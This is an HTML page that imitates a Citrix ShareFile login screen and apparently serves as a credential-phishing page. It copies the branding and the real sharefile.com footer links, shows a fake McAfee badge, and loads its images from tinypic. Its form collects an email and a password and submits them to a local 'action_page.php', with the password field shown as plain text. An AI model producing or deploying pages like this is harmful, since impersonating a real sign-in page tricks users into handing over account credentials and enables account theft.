<!DOCTYPE html>
<html>
	<head>
		<title>Sharefile Login</title>
		<link rel="stylesheet" type="text/css" href="sharefilerecode.css">
	</head>
	<body background="http://i68.tinypic.com/280urcx.jpg">
		
		
		<div class="container">
			<center>
			<br><br>
			<img src="http://i68.tinypic.com/346qs5s.png" id="prof-pic">
			<br><br><br><br>
			
<style>
input[type=text], select {
    color: grey;
    background-color: rgb(235,235,235);
    width: 100%;
    height: 50px;
    padding: 12px 20px;
    margin: 1px 0;
    display: inline-block;
    border: none;
    box-sizing: border-box;
}

input[type=submit] {
    width: 100%;
    background-color: #78be20;
    color: white;
    padding: 14px 20px;
    margin: 1px 0;
    border: none;
    border-radius: none;
    cursor: pointer;
}

input[type=submit]:hover {
    background-color: #94db14;
}

div {
    border-radius: 1px;
    background-color: #f2f2f2;
    padding: 1px;
}
</style>
<body>

<div>
  <form action="/action_page.php">
    <input type="text" id="fname" placeholder="Email">

    <input type="text" id="lname" name="lastname" placeholder="Password">
  
    <input type="submit" value="Sign In">
  </form>
</div>

</body>
 <br>
			<a href="https://secure.sharefile.com/authentication/login#SubdomainManual" id="links">Log in with my company credentials</a>
			<br>

			<a href="https://secure.sharefile.com/authentication/login#ForgotPassword" id="links" >Forgot Password?</a>
			<br>

			<a href="https://secure.sharefile.com/_Auth/PrivacyPolicy/en.html" id="links">Privacy Policy
			</a>

			<br><br><br><br><br>
			<img src="http://i65.tinypic.com/8z3eog.png" id="citrix"></a>
			
			</center>
			
		<a href="https://www.mcafeesecure.com/verify?host=scan.sharefile.com"><img src="http://i64.tinypic.com/23m329z.png" id="right-floater"></a>
		</div>

		<footer>
		<table>
			<col width="280px"><col width="280px"><col width="280px">
			<tr>
    <th>

    <img src="http://i67.tinypic.com/28k3hxl.png" width="45%" id="footerpics"></a>
    <br>
    <font id="text1">Tips and Tricks</font>
     <br><br>
   <font id="text2"> Get more from your ShareFile account. Our blog has tips, product news, and stories about how other customers use ShareFile.</font>
    <br><br>
    <a href="https://www.sharefile.com/blog/" id="text3">See the Blog</a>
    <br><br>
    <a href="https://www.sharefile.com/resources?src=login" id="text3">Visit the Resource Center</a>
    </th>
    <th>
    <img src="http://i65.tinypic.com/28cke85.png" id="footerpics"></a>
    <br>
<font id="text1">Refer a Friend</font>
    <br><br>
    

<font id="text2">Refer your friends to ShareFile — they get a 30-day free trial, and you get a $100 gift card good at top retailers.</font>
<br><br>
    <a href="" id="text3">Learn More</a>
    </th> 
    <th>
    <img src="http://i67.tinypic.com/ve1154.png" id="footerpics"></a>
    <br>
    <font id="text1">Need Help?</font>
    <br><br>
    <font id="text2">
    Our knowledgeable support team is available 24 hours a day, seven days a week.
    </font><br>
    <br>
    <a href="https://www.sharefile.com/support" id="text3">Get in Touch</a>
    <br><br>
    <a href="https://trial.sharefile.com/trial/cq/p1n.aspx?src=login" id="text3">Try for Free</a>
    </th>
  </tr>
  
		</table>
  
</footer>
	</body>


</html>
